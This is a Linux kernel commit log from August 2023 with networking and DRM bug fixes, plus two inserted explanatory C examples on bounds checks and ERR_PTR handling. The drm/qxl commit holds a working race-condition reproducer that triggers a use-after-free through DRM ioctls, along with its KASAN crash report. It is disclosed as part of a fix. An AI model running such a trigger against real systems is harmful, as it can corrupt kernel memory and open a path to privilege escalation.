1. 23 Aug, 2023 4 commits
  2. 22 Aug, 2023 6 commits
  3. 21 Aug, 2023 2 commits
    • wifi: mac80211: limit reorder_buf_filtered to avoid UBSAN warning · b98c1610
      Ping-Ke Shih authored
      The commit 06470f74 ("mac80211: add API to allow filtering frames in BA sessions")
      added reorder_buf_filtered to mark frames filtered by firmware, and it
      can only work correctly if hw.max_rx_aggregation_subframes <= 64 since
      it stores the bitmap in a u64 variable.
      
      However, new HE or EHT devices can support BlockAck number up to 256 or
      1024, and then using a higher subframe index leads to a UBSAN warning:
      
       UBSAN: shift-out-of-bounds in net/mac80211/rx.c:1129:39
       shift exponent 215 is too large for 64-bit type 'long long unsigned int'
       Call Trace:
        <IRQ>
        dump_stack_lvl+0x48/0x70
        dump_stack+0x10/0x20
        __ubsan_handle_shift_out_of_bounds+0x1ac/0x360
        ieee80211_release_reorder_frame.constprop.0.cold+0x64/0x69 [mac80211]
        ieee80211_sta_reorder_release+0x9c/0x400 [mac80211]
        ieee80211_prepare_and_rx_handle+0x1234/0x1420 [mac80211]
        ieee80211_rx_list+0xaef/0xf60 [mac80211]
        ieee80211_rx_napi+0x53/0xd0 [mac80211]
      
      Since only old hardware that supports <=64 BlockAck uses
      ieee80211_mark_rx_ba_filtered_frames(), limit the use as it is, so add a
      WARN_ONCE() and comment to note to avoid using this function if hardware
      capability is not suitable.
      Signed-off-by: Ping-Ke Shih <pkshih@realtek.com>
      Link: https://lore.kernel.org/r/20230818014004.16177-1-pkshih@realtek.com
      [edit commit message]
      Signed-off-by: Johannes Berg <johannes.berg@intel.com>
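      Added example, not mac80211 code: a user-space model of the u64 filtered mask the commit above describes. It shows why an index taken from a 256- or 1024-frame BlockAck window has to be refused before it reaches the shift, and what the 64-frame case looks like when every slot is representable. The struct and function names (reorder_state, mark_filtered, is_filtered) are invented for this example, and the check stands in for the WARN_ONCE() the patch adds.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Hypothetical stand-in for the per-TID reorder buffer state; the real
 * struct lives in net/mac80211. A u64 filtered mask describes at most 64
 * subframes, one bit per reorder-buffer slot. */
#define FILTERED_MASK_BITS 64

struct reorder_state {
    unsigned int buf_size;      /* BlockAck window negotiated for the session */
    uint64_t buf_filtered;      /* bit n set: slot n was filtered by firmware */
};

/* Mark slot `index` as filtered. Refuses (and leaves the mask alone) when the
 * session's window cannot be represented, instead of shifting a 64-bit value
 * by >= 64, which is undefined behaviour and exactly what UBSAN flagged. */
static bool mark_filtered(struct reorder_state *st, unsigned int index)
{
    if (st->buf_size > FILTERED_MASK_BITS || index >= FILTERED_MASK_BITS) {
        fprintf(stderr, "reorder: window %u / index %u exceeds %u-bit mask, ignoring\n",
                st->buf_size, index, FILTERED_MASK_BITS);
        return false;
    }
    st->buf_filtered |= (uint64_t)1 << index;
    return true;
}

static bool is_filtered(const struct reorder_state *st, unsigned int index)
{
    if (index >= FILTERED_MASK_BITS)
        return false;
    return (st->buf_filtered >> index) & 1u;
}

/* Legacy-style device with a 64-frame window: every slot is addressable.
 * Marks slots 0, 7, 14, ..., 63 and returns how many were set and read back. */
static unsigned int demo_legacy_window(void)
{
    struct reorder_state st = { .buf_size = 64, .buf_filtered = 0 };
    unsigned int marked = 0;

    for (unsigned int i = 0; i < 64; i += 7)
        if (mark_filtered(&st, i) && is_filtered(&st, i))
            marked++;
    return marked;
}

/* HE/EHT-style device with a 256-frame window: the index from the UBSAN
 * report (215) must be rejected rather than shifted. Returns true if the
 * mask stayed untouched. */
static bool demo_large_window_rejected(void)
{
    struct reorder_state st = { .buf_size = 256, .buf_filtered = 0 };

    bool accepted = mark_filtered(&st, 215);
    return !accepted && st.buf_filtered == 0;
}

int main(void)
{
    printf("64-frame window: %u slots marked\n", demo_legacy_window());
    printf("256-frame window: index 215 %s\n",
           demo_large_window_rejected() ? "rejected" : "ACCEPTED (bug)");
    return 0;
}
```

      The point of the guard is that the mask's width, not the hardware's advertised window, is what bounds the index; a driver whose hw.max_rx_aggregation_subframes exceeds 64 should not call into this path at all.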
    • MAINTAINERS: add entry for macsec · d1cdbf66
      Sabrina Dubroca authored
      Jakub asked if I'd be willing to be the maintainer of the macsec code
      and review the driver code adding macsec offload, so let's add the
      corresponding entry.
      
      The keyword lines are meant to catch selftests and patches adding HW
      offload support to other drivers.
      Suggested-by: Jakub Kicinski <kuba@kernel.org>
      Signed-off-by: Sabrina Dubroca <sd@queasysnail.net>
      Reviewed-by: Simon Horman <horms@kernel.org>
      Signed-off-by: David S. Miller <davem@davemloft.net>
  4. 20 Aug, 2023 6 commits
    • selftests/net: Add log.txt and tools to .gitignore · 144e22e7
      Anh Tuan Phan authored
      Update .gitignore to untrack tools directory and log.txt. "tools" is
      generated in "selftests/net/Makefile" and log.txt is generated in
      "selftests/net/gro.sh" when executing run_all_tests.
      Signed-off-by: Anh Tuan Phan <tuananhlfc@gmail.com>
      Signed-off-by: David S. Miller <davem@davemloft.net>
    • ipv4: fix data-races around inet->inet_id · f866fbc8
      Eric Dumazet authored
      UDP sendmsg() is lockless, so ip_select_ident_segs()
      can very well be run from multiple cpus [1]
      
      Convert inet->inet_id to an atomic_t, but implement
      a dedicated path for TCP, avoiding cost of a locked
      instruction (atomic_add_return())
      
      Note that this patch will cause a trivial merge conflict
      because we added inet->flags in net-next tree.
      
      v2: added missing change in
      drivers/net/ethernet/chelsio/inline_crypto/chtls/chtls_cm.c
      (David Ahern)
      
      [1]
      
      BUG: KCSAN: data-race in __ip_make_skb / __ip_make_skb
      
      read-write to 0xffff888145af952a of 2 bytes by task 7803 on cpu 1:
      ip_select_ident_segs include/net/ip.h:542 [inline]
      ip_select_ident include/net/ip.h:556 [inline]
      __ip_make_skb+0x844/0xc70 net/ipv4/ip_output.c:1446
      ip_make_skb+0x233/0x2c0 net/ipv4/ip_output.c:1560
      udp_sendmsg+0x1199/0x1250 net/ipv4/udp.c:1260
      inet_sendmsg+0x63/0x80 net/ipv4/af_inet.c:830
      sock_sendmsg_nosec net/socket.c:725 [inline]
      sock_sendmsg net/socket.c:748 [inline]
      ____sys_sendmsg+0x37c/0x4d0 net/socket.c:2494
      ___sys_sendmsg net/socket.c:2548 [inline]
      __sys_sendmmsg+0x269/0x500 net/socket.c:2634
      __do_sys_sendmmsg net/socket.c:2663 [inline]
      __se_sys_sendmmsg net/socket.c:2660 [inline]
      __x64_sys_sendmmsg+0x57/0x60 net/socket.c:2660
      do_syscall_x64 arch/x86/entry/common.c:50 [inline]
      do_syscall_64+0x41/0xc0 arch/x86/entry/common.c:80
      entry_SYSCALL_64_after_hwframe+0x63/0xcd
      
      read to 0xffff888145af952a of 2 bytes by task 7804 on cpu 0:
      ip_select_ident_segs include/net/ip.h:541 [inline]
      ip_select_ident include/net/ip.h:556 [inline]
      __ip_make_skb+0x817/0xc70 net/ipv4/ip_output.c:1446
      ip_make_skb+0x233/0x2c0 net/ipv4/ip_output.c:1560
      udp_sendmsg+0x1199/0x1250 net/ipv4/udp.c:1260
      inet_sendmsg+0x63/0x80 net/ipv4/af_inet.c:830
      sock_sendmsg_nosec net/socket.c:725 [inline]
      sock_sendmsg net/socket.c:748 [inline]
      ____sys_sendmsg+0x37c/0x4d0 net/socket.c:2494
      ___sys_sendmsg net/socket.c:2548 [inline]
      __sys_sendmmsg+0x269/0x500 net/socket.c:2634
      __do_sys_sendmmsg net/socket.c:2663 [inline]
      __se_sys_sendmmsg net/socket.c:2660 [inline]
      __x64_sys_sendmmsg+0x57/0x60 net/socket.c:2660
      do_syscall_x64 arch/x86/entry/common.c:50 [inline]
      do_syscall_64+0x41/0xc0 arch/x86/entry/common.c:80
      entry_SYSCALL_64_after_hwframe+0x63/0xcd
      
      value changed: 0x184d -> 0x184e
      
      Reported by Kernel Concurrency Sanitizer on:
      CPU: 0 PID: 7804 Comm: syz-executor.1 Not tainted 6.5.0-rc6-syzkaller #0
      Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 07/26/2023
      ==================================================================
      
      Fixes: 23f57406 ("ipv4: avoid using shared IP generator for connected sockets")
      Reported-by: syzbot <syzkaller@googlegroups.com>
      Signed-off-by: Eric Dumazet <edumazet@google.com>
      Reviewed-by: David Ahern <dsahern@kernel.org>
      Signed-off-by: David S. Miller <davem@davemloft.net>
    • net: validate veth and vxcan peer ifindexes · f534f658
      Jakub Kicinski authored
      veth and vxcan need to make sure the ifindexes of the peer
      are not negative, core does not validate this.
      
      Using iproute2 with user-space-level checking removed:
      
      Before:
      
        # ./ip link add index 10 type veth peer index -1
        # ip link show
        1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000
          link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
        2: enp1s0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP mode DEFAULT group default qlen 1000
          link/ether 52:54:00:74:b2:03 brd ff:ff:ff:ff:ff:ff
        10: veth1@veth0: <BROADCAST,MULTICAST,M-DOWN> mtu 1500 qdisc noop state DOWN mode DEFAULT group default qlen 1000
          link/ether 8a:90:ff:57:6d:5d brd ff:ff:ff:ff:ff:ff
        -1: veth0@veth1: <BROADCAST,MULTICAST,M-DOWN> mtu 1500 qdisc noop state DOWN mode DEFAULT group default qlen 1000
          link/ether ae:ed:18:e6:fa:7f brd ff:ff:ff:ff:ff:ff
      
      Now:
      
        $ ./ip link add index 10 type veth peer index -1
        Error: ifindex can't be negative.
      
      This problem surfaced in net-next because an explicit WARN()
      was added, the root cause is older.
      
      Fixes: e6f8f1a7 ("veth: Allow to create peer link with given ifindex")
      Fixes: a8f820a3 ("can: add Virtual CAN Tunnel driver (vxcan)")
      Reported-by: syzbot+5ba06978f34abb058571@syzkaller.appspotmail.com
      Signed-off-by: Jakub Kicinski <kuba@kernel.org>
      Reviewed-by: Eric Dumazet <edumazet@google.com>
      Signed-off-by: David S. Miller <davem@davemloft.net>
    • Merge branch 'fixed_phy_register-return-value' · c727c6f7
      David S. Miller authored
      Ruan Jinjie says:
      
      ====================
      net: Fix return value check for fixed_phy_register()
      
      The fixed_phy_register() function returns error pointers and never
      returns NULL. Update the checks accordingly.
      
      Changes in v3:
      - Drop the error fix patch for fixed_phy_get_gpiod().
      - Split the error code update code into another patch set as suggested.
      - Update the commit title and message.
      ====================
      Signed-off-by: David S. Miller <davem@davemloft.net>
    • net: bcmgenet: Fix return value check for fixed_phy_register() · 32bbe64a
      Ruan Jinjie authored
      The fixed_phy_register() function returns error pointers and never
      returns NULL. Update the checks accordingly.
      
      Fixes: b0ba512e ("net: bcmgenet: enable driver to work without a device tree")
      Signed-off-by: Ruan Jinjie <ruanjinjie@huawei.com>
      Reviewed-by: Leon Romanovsky <leonro@nvidia.com>
      Acked-by: Doug Berger <opendmb@gmail.com>
      Signed-off-by: David S. Miller <davem@davemloft.net>
    • net: bgmac: Fix return value check for fixed_phy_register() · 23a14488
      Ruan Jinjie authored
      The fixed_phy_register() function returns error pointers and never
      returns NULL. Update the checks accordingly.
      
      Fixes: c25b23b8 ("bgmac: register fixed PHY for ARM BCM470X / BCM5301X chipsets")
      Signed-off-by: Ruan Jinjie <ruanjinjie@huawei.com>
      Reviewed-by: Andrew Lunn <andrew@lunn.ch>
      Reviewed-by: Leon Romanovsky <leonro@nvidia.com>
      Signed-off-by: David S. Miller <davem@davemloft.net>
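      The merge above and its two patches (bcmgenet, bgmac) all turn on one idiom: a function that returns ERR_PTR() on failure is never NULL, so `if (!ptr)` silently lets the error through. Added example, not driver or kernel code: user-space copies of the ERR_PTR/IS_ERR/PTR_ERR helpers and a hypothetical fake_fixed_phy_register() that mimics the real function's contract, showing the check the patches remove next to the one they install. Every name here other than the three helpers is invented for the example.

```c
#include <errno.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* User-space copies of the kernel helpers from include/linux/err.h: an error
 * code is encoded in the top MAX_ERRNO addresses, which never hold a valid
 * object, so one pointer can carry either a result or an -errno. */
#define MAX_ERRNO 4095

static inline void *ERR_PTR(long error) { return (void *)(intptr_t)error; }
static inline long PTR_ERR(const void *ptr) { return (long)(intptr_t)ptr; }
static inline bool IS_ERR(const void *ptr)
{
    return (uintptr_t)ptr >= (uintptr_t)-MAX_ERRNO;
}

struct phy_device {
    int speed;
};

/* Hypothetical stand-in for fixed_phy_register(): like the real function it
 * returns either a usable phy_device or an ERR_PTR, never NULL. */
static struct phy_device *fake_fixed_phy_register(int speed)
{
    static struct phy_device phy;

    if (speed <= 0)
        return ERR_PTR(-EINVAL);
    phy.speed = speed;
    return &phy;
}

/* Pattern the two patches remove: a NULL check cannot see an ERR_PTR, so the
 * error path is skipped and the caller goes on to use the "pointer". This
 * version returns -EPROTO as a marker where real driver code would already
 * have dereferenced an address in the top 4095 bytes of the address space. */
static int probe_with_null_check(int speed)
{
    struct phy_device *phy = fake_fixed_phy_register(speed);

    if (!phy)
        return -ENODEV;            /* never taken: ERR_PTR(-EINVAL) is non-NULL */
    if (IS_ERR(phy))
        return -EPROTO;            /* marker: error pointer slipped through */
    return phy->speed;
}

/* Corrected pattern: test with IS_ERR() and propagate PTR_ERR(). */
static int probe_with_is_err(int speed)
{
    struct phy_device *phy = fake_fixed_phy_register(speed);

    if (IS_ERR(phy))
        return (int)PTR_ERR(phy);
    return phy->speed;
}

int main(void)
{
    printf("NULL check, invalid speed: %d (expected -EINVAL = %d)\n",
           probe_with_null_check(0), -EINVAL);
    printf("IS_ERR check, invalid speed: %d\n", probe_with_is_err(0));
    printf("IS_ERR check, 1000 Mbit/s:   %d\n", probe_with_is_err(1000));
    return 0;
}
```

      When reviewing a caller, the question to ask is which convention the callee documents: NULL-on-failure, ERR_PTR-on-failure, or both (IS_ERR_OR_NULL). Checking for the wrong one compiles cleanly and only fails on the error path.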
  5. 19 Aug, 2023 14 commits
  6. 18 Aug, 2023 4 commits
    • octeontx2-af: SDP: fix receive link config · 05f3d5bc
      Hariprasad Kelam authored
      On SDP interfaces, frame oversize and undersize errors are
      observed as driver is not considering packet sizes of all
      subscribers of the link before updating the link config.
      
      This patch fixes the same.
      
      Fixes: 9b7dd87a ("octeontx2-af: Support to modify min/max allowed packet lengths")
      Signed-off-by: Hariprasad Kelam <hkelam@marvell.com>
      Signed-off-by: Sunil Goutham <sgoutham@marvell.com>
      Reviewed-by: Leon Romanovsky <leonro@nvidia.com>
      Link: https://lore.kernel.org/r/20230817063006.10366-1-hkelam@marvell.com
      Signed-off-by: Jakub Kicinski <kuba@kernel.org>
    • Merge tag 'batadv-net-pullrequest-20230816' of git://git.open-mesh.org/linux-merge · 7793a88e
      Jakub Kicinski authored
      Simon Wunderlich says:
      
      ====================
      Here are some batman-adv bugfixes:
      
       - Fix issues with adjusted MTUs (2 patches), by Sven Eckelmann
      
       - Fix header access for memory reallocation case, by Remi Pommarel
      
       - Fix two memory leaks (2 patches), by Remi Pommarel
      
      * tag 'batadv-net-pullrequest-20230816' of git://git.open-mesh.org/linux-merge:
        batman-adv: Fix batadv_v_ogm_aggr_send memory leak
        batman-adv: Fix TT global entry leak when client roamed back
        batman-adv: Do not get eth header before batadv_check_management_packet
        batman-adv: Don't increase MTU when set by user
        batman-adv: Trigger events for auto adjusted MTU
      ====================
      
      Link: https://lore.kernel.org/r/20230816163318.189996-1-sw@simonwunderlich.de
      Signed-off-by: Jakub Kicinski <kuba@kernel.org>
    • Merge tag 'net-6.5-rc7' of git://git.kernel.org/pub/scm/linux/kernel/git/netdev/net · 0e8860d2
      Linus Torvalds authored
      Pull networking fixes from Jakub Kicinski:
       "Including fixes from ipsec and netfilter.
      
        No known outstanding regressions.
      
        Fixes to fixes:
      
         - virtio-net: set queues after driver_ok, avoid a potential race
           added by recent fix
      
         - Revert "vlan: Fix VLAN 0 memory leak", it may lead to a warning
           when VLAN 0 is registered explicitly
      
         - nf_tables:
            - fix false-positive lockdep splat in recent fixes
            - don't fail inserts if duplicate has expired (fix test failures)
            - fix races between garbage collection and netns dismantle
      
        Current release - new code bugs:
      
         - mlx5: Fix mlx5_cmd_update_root_ft() error flow
      
        Previous releases - regressions:
      
         - phy: fix IRQ-based wake-on-lan over hibernate / power off
      
        Previous releases - always broken:
      
         - sock: fix misuse of sk_under_memory_pressure() preventing system
           from exiting global TCP memory pressure if a single cgroup is under
           pressure
      
         - fix the RTO timer retransmitting skb every 1ms if linear option is
           enabled
      
         - af_key: fix sadb_x_filter validation, amend netlink policy
      
         - ipsec: fix slab-use-after-free in decode_session6()
      
         - macb: in ZynqMP resume always configure PS GTR for non-wakeup
           source
      
        Misc:
      
         - netfilter: set default timeout to 3 secs for sctp shutdown send and
           recv state (from 300ms), align with protocol timers"
      
      * tag 'net-6.5-rc7' of git://git.kernel.org/pub/scm/linux/kernel/git/netdev/net: (49 commits)
        ice: Block switchdev mode when ADQ is active and vice versa
        qede: fix firmware halt over suspend and resume
        net: do not allow gso_size to be set to GSO_BY_FRAGS
        sock: Fix misuse of sk_under_memory_pressure()
        sfc: don't fail probe if MAE/TC setup fails
        sfc: don't unregister flow_indr if it was never registered
        net: dsa: mv88e6xxx: Wait for EEPROM done before HW reset
        net/mlx5: Fix mlx5_cmd_update_root_ft() error flow
        net/mlx5e: XDP, Fix fifo overrun on XDP_REDIRECT
        i40e: fix misleading debug logs
        iavf: fix FDIR rule fields masks validation
        ipv6: fix indentation of a config attribute
        mailmap: add entries for Simon Horman
        broadcom: b44: Use b44_writephy() return value
        net: openvswitch: reject negative ifindex
        team: Fix incorrect deletion of ETH_P_8021AD protocol vid from slaves
        net: phy: broadcom: stub c45 read/write for 54810
        netfilter: nft_dynset: disallow object maps
        netfilter: nf_tables: GC transaction race with netns dismantle
        netfilter: nf_tables: fix GC transaction races with netns and netlink event exit path
        ...
    • Merge tag 'drm-fixes-2023-08-18-1' of git://anongit.freedesktop.org/drm/drm · 1ada9c07
      Linus Torvalds authored
      Pull drm fixes from Dave Airlie:
       "Regular enough week, mostly the usual amdgpu and i915 fixes.  Also
        qaic, nouveau, qxl and a revert for an EDID patch that had some side
        effects, along with a couple of panel fixes.
      
        edid:
         - revert mode parsing fix that had side effects.
      
        i915:
         - Fix the flow for ignoring GuC SLPC efficient frequency selection
         - Fix SDVO panel_type initialization
         - Fix display probe for IVB Q and IVB D GT2 server
      
        nouveau:
         - fix use-after-free in connector code
      
        qaic:
         - integer overflow check fix
         - fix slicing memory leak
      
        panel:
         - fix JDI LT070ME05000 probing
         - fix AUO G121EAN01 timings
      
        amdgpu:
         - SMU 13.x fixes
         - Fix mcbp parameter for gfx9
         - SMU 11.x fixes
         - Temporary fix for large numbers of XCP partitions
         - S0ix fixes
         - DCN 2.0 fix
      
        qxl:
         - fix use after free race in dumb object allocation"
      
      * tag 'drm-fixes-2023-08-18-1' of git://anongit.freedesktop.org/drm/drm:
        drm/qxl: fix UAF on handle creation
        Revert "drm/edid: Fix csync detailed mode parsing"
        drm/nouveau/disp: fix use-after-free in error handling of nouveau_connector_create
        Revert "Revert "drm/amdgpu/display: change pipe policy for DCN 2.0""
        drm/amd: flush any delayed gfxoff on suspend entry
        drm/amdgpu: skip fence GFX interrupts disable/enable for S0ix
        drm/amdgpu: skip xcp drm device allocation when out of drm resource
        drm/amd/pm: Update pci link width for smu v13.0.6
        drm/amd/pm: Fix temperature unit of SMU v13.0.6
        drm/amdgpu/pm: fix throttle_status for other than MP1 11.0.7
        drm/amdgpu: disable mcbp if parameter zero is set
        drm/amd/pm: disallow the fan setting if there is no fan on smu 13.0.0
        accel/qaic: Clean up integer overflow checking in map_user_pages()
        accel/qaic: Fix slicing memory leak
        drm/i915: fix display probe for IVB Q and IVB D GT2 server
        drm/i915/sdvo: fix panel_type initialization
        drm/i915/guc/slpc: Restore efficient freq earlier
        drm/panel: simple: Fix AUO G121EAN01 panel timings according to the docs
        drm/panel: JDI LT070ME05000 simplify with dev_err_probe()
  7. 17 Aug, 2023 4 commits
    • Merge branch '40GbE' of git://git.kernel.org/pub/scm/linux/kernel/git/tnguy/net-queue · 820a38d8
      Jakub Kicinski authored
      Tony Nguyen says:
      
      ====================
      Intel Wired LAN Driver Updates 2023-08-16 (iavf, i40e)
      
      This series contains updates to iavf and i40e drivers.
      
      Piotr adds checks for unsupported Flow Director rules on iavf.
      
      Andrii replaces incorrect 'write' messaging on read operations for i40e.
      
      * '40GbE' of git://git.kernel.org/pub/scm/linux/kernel/git/tnguy/net-queue:
        i40e: fix misleading debug logs
        iavf: fix FDIR rule fields masks validation
      ====================
      
      Link: https://lore.kernel.org/r/20230816193308.1307535-1-anthony.l.nguyen@intel.com
      Signed-off-by: Jakub Kicinski <kuba@kernel.org>
    • drm/qxl: fix UAF on handle creation · c611589b
      Wander Lairson Costa authored
      qxl_mode_dumb_create() dereferences the qobj returned by
      qxl_gem_object_create_with_handle(), but the handle is the only one
      holding a reference to it.
      
      A potential attacker could guess the returned handle value and close it
      between the return of qxl_gem_object_create_with_handle() and the qobj
      usage, triggering a use-after-free scenario.
      
      Reproducer:
      
      /* Build with: cc -pthread poc.c -o poc (needs the DRM uapi headers). */
      #include <fcntl.h>
      #include <pthread.h>
      #include <stdio.h>
      #include <stdlib.h>
      #include <sys/ioctl.h>
      #include <unistd.h>
      #include <drm/drm.h>
      #include <drm/drm_mode.h>
      
      int dri_fd = -1;
      struct drm_mode_create_dumb arg = {0};  /* shared so main() can race on arg.handle */
      
      void gem_close(int handle);
      
      /* Worker thread: keep creating dumb buffers so that the main thread can
       * race a DRM_IOCTL_GEM_CLOSE against each freshly returned handle. */
      void* trigger(void* ptr)
      {
      	int ret;
      	(void)ptr;
      	arg.width = arg.height = 0x20;
      	arg.bpp = 32;
      	ret = ioctl(dri_fd, DRM_IOCTL_MODE_CREATE_DUMB, &arg);
      	if(ret)
      	{
      		perror("[*] DRM_IOCTL_MODE_CREATE_DUMB Failed");
      		exit(-1);
      	}
      	gem_close(arg.handle);
      	while(1) {
      		struct drm_mode_create_dumb args = {0};
      		args.width = args.height = 0x20;
      		args.bpp = 32;
      		ret = ioctl(dri_fd, DRM_IOCTL_MODE_CREATE_DUMB, &args);
      		if (ret) {
      			perror("[*] DRM_IOCTL_MODE_CREATE_DUMB Failed");
      			exit(-1);
      		}
      
      		printf("[*] DRM_IOCTL_MODE_CREATE_DUMB created, %d\n", args.handle);
      		gem_close(args.handle);
      	}
      	return NULL;
      }
      
      /* Drop the handle; with the bug present this releases the only reference
       * to the object while qxl_mode_dumb_create() may still be using it. */
      void gem_close(int handle)
      {
      	struct drm_gem_close args = {0};
      	args.handle = handle;
      	int ret = ioctl(dri_fd, DRM_IOCTL_GEM_CLOSE, &args); // gem close handle
      	if (!ret)
      		printf("gem close handle %d\n", args.handle);
      }
      
      int main(void)
      {
      	dri_fd= open("/dev/dri/card0", O_RDWR);
      	printf("fd:%d\n", dri_fd);
      
      	if(dri_fd == -1)
      		return -1;
      
      	pthread_t tid1;
      
      	if(pthread_create(&tid1,NULL,trigger,NULL)){
      		perror("[*] thread_create tid1\n");
      		return -1;
      	}
      	/* Main thread: hammer GEM_CLOSE on whatever handle the worker last
      	 * published, guessing the value the next create will return. */
      	while (1)
      	{
      		gem_close(arg.handle);
      	}
      	return 0;
      }
      
      This is a KASAN report:
      
      ==================================================================
      BUG: KASAN: slab-use-after-free in qxl_mode_dumb_create+0x3c2/0x400 linux/drivers/gpu/drm/qxl/qxl_dumb.c:69
      Write of size 1 at addr ffff88801136c240 by task poc/515
      
      CPU: 1 PID: 515 Comm: poc Not tainted 6.3.0 #3
      Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.0-debian-1.16.0-4 04/01/2014
      Call Trace:
      <TASK>
      __dump_stack linux/lib/dump_stack.c:88
      dump_stack_lvl+0x48/0x70 linux/lib/dump_stack.c:106
      print_address_description linux/mm/kasan/report.c:319
      print_report+0xd2/0x660 linux/mm/kasan/report.c:430
      kasan_report+0xd2/0x110 linux/mm/kasan/report.c:536
      __asan_report_store1_noabort+0x17/0x30 linux/mm/kasan/report_generic.c:383
      qxl_mode_dumb_create+0x3c2/0x400 linux/drivers/gpu/drm/qxl/qxl_dumb.c:69
      drm_mode_create_dumb linux/drivers/gpu/drm/drm_dumb_buffers.c:96
      drm_mode_create_dumb_ioctl+0x1f5/0x2d0 linux/drivers/gpu/drm/drm_dumb_buffers.c:102
      drm_ioctl_kernel+0x21d/0x430 linux/drivers/gpu/drm/drm_ioctl.c:788
      drm_ioctl+0x56f/0xcc0 linux/drivers/gpu/drm/drm_ioctl.c:891
      vfs_ioctl linux/fs/ioctl.c:51
      __do_sys_ioctl linux/fs/ioctl.c:870
      __se_sys_ioctl linux/fs/ioctl.c:856
      __x64_sys_ioctl+0x13d/0x1c0 linux/fs/ioctl.c:856
      do_syscall_x64 linux/arch/x86/entry/common.c:50
      do_syscall_64+0x5b/0x90 linux/arch/x86/entry/common.c:80
      entry_SYSCALL_64_after_hwframe+0x72/0xdc linux/arch/x86/entry/entry_64.S:120
      RIP: 0033:0x7ff5004ff5f7
      Code: 00 00 00 48 8b 05 99 c8 0d 00 64 c7 00 26 00 00 00 48 c7 c0 ff ff ff ff c3 66 2e 0f 1f 84 00 00 00 00 00 b8 10 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 69 c8 0d 00 f7 d8 64 89 01 48
      
      RSP: 002b:00007ff500408ea8 EFLAGS: 00000286 ORIG_RAX: 0000000000000010
      RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007ff5004ff5f7
      RDX: 00007ff500408ec0 RSI: 00000000c02064b2 RDI: 0000000000000003
      RBP: 00007ff500408ef0 R08: 0000000000000000 R09: 000000000000002a
      R10: 0000000000000000 R11: 0000000000000286 R12: 00007fff1c6cdafe
      R13: 00007fff1c6cdaff R14: 00007ff500408fc0 R15: 0000000000802000
      </TASK>
      
      Allocated by task 515:
      kasan_save_stack+0x38/0x70 linux/mm/kasan/common.c:45
      kasan_set_track+0x25/0x40 linux/mm/kasan/common.c:52
      kasan_save_alloc_info+0x1e/0x40 linux/mm/kasan/generic.c:510
      ____kasan_kmalloc linux/mm/kasan/common.c:374
      __kasan_kmalloc+0xc3/0xd0 linux/mm/kasan/common.c:383
      kasan_kmalloc linux/./include/linux/kasan.h:196
      kmalloc_trace+0x48/0xc0 linux/mm/slab_common.c:1066
      kmalloc linux/./include/linux/slab.h:580
      kzalloc linux/./include/linux/slab.h:720
      qxl_bo_create+0x11a/0x610 linux/drivers/gpu/drm/qxl/qxl_object.c:124
      qxl_gem_object_create+0xd9/0x360 linux/drivers/gpu/drm/qxl/qxl_gem.c:58
      qxl_gem_object_create_with_handle+0xa1/0x180 linux/drivers/gpu/drm/qxl/qxl_gem.c:89
      qxl_mode_dumb_create+0x1cd/0x400 linux/drivers/gpu/drm/qxl/qxl_dumb.c:63
      drm_mode_create_dumb linux/drivers/gpu/drm/drm_dumb_buffers.c:96
      drm_mode_create_dumb_ioctl+0x1f5/0x2d0 linux/drivers/gpu/drm/drm_dumb_buffers.c:102
      drm_ioctl_kernel+0x21d/0x430 linux/drivers/gpu/drm/drm_ioctl.c:788
      drm_ioctl+0x56f/0xcc0 linux/drivers/gpu/drm/drm_ioctl.c:891
      vfs_ioctl linux/fs/ioctl.c:51
      __do_sys_ioctl linux/fs/ioctl.c:870
      __se_sys_ioctl linux/fs/ioctl.c:856
      __x64_sys_ioctl+0x13d/0x1c0 linux/fs/ioctl.c:856
      do_syscall_x64 linux/arch/x86/entry/common.c:50
      do_syscall_64+0x5b/0x90 linux/arch/x86/entry/common.c:80
      entry_SYSCALL_64_after_hwframe+0x72/0xdc linux/arch/x86/entry/entry_64.S:120
      
      Freed by task 515:
      kasan_save_stack+0x38/0x70 linux/mm/kasan/common.c:45
      kasan_set_track+0x25/0x40 linux/mm/kasan/common.c:52
      kasan_save_free_info+0x2e/0x60 linux/mm/kasan/generic.c:521
      ____kasan_slab_free linux/mm/kasan/common.c:236
      ____kasan_slab_free+0x180/0x1f0 linux/mm/kasan/common.c:200
      __kasan_slab_free+0x12/0x30 linux/mm/kasan/common.c:244
      kasan_slab_free linux/./include/linux/kasan.h:162
      slab_free_hook linux/mm/slub.c:1781
      slab_free_freelist_hook+0xd2/0x1a0 linux/mm/slub.c:1807
      slab_free linux/mm/slub.c:3787
      __kmem_cache_free+0x196/0x2d0 linux/mm/slub.c:3800
      kfree+0x78/0x120 linux/mm/slab_common.c:1019
      qxl_ttm_bo_destroy+0x140/0x1a0 linux/drivers/gpu/drm/qxl/qxl_object.c:49
      ttm_bo_release+0x678/0xa30 linux/drivers/gpu/drm/ttm/ttm_bo.c:381
      kref_put linux/./include/linux/kref.h:65
      ttm_bo_put+0x50/0x80 linux/drivers/gpu/drm/ttm/ttm_bo.c:393
      qxl_gem_object_free+0x3e/0x60 linux/drivers/gpu/drm/qxl/qxl_gem.c:42
      drm_gem_object_free+0x5c/0x90 linux/drivers/gpu/drm/drm_gem.c:974
      kref_put linux/./include/linux/kref.h:65
      __drm_gem_object_put linux/./include/drm/drm_gem.h:431
      drm_gem_object_put linux/./include/drm/drm_gem.h:444
      qxl_gem_object_create_with_handle+0x151/0x180 linux/drivers/gpu/drm/qxl/qxl_gem.c:100
      qxl_mode_dumb_create+0x1cd/0x400 linux/drivers/gpu/drm/qxl/qxl_dumb.c:63
      drm_mode_create_dumb linux/drivers/gpu/drm/drm_dumb_buffers.c:96
      drm_mode_create_dumb_ioctl+0x1f5/0x2d0 linux/drivers/gpu/drm/drm_dumb_buffers.c:102
      drm_ioctl_kernel+0x21d/0x430 linux/drivers/gpu/drm/drm_ioctl.c:788
      drm_ioctl+0x56f/0xcc0 linux/drivers/gpu/drm/drm_ioctl.c:891
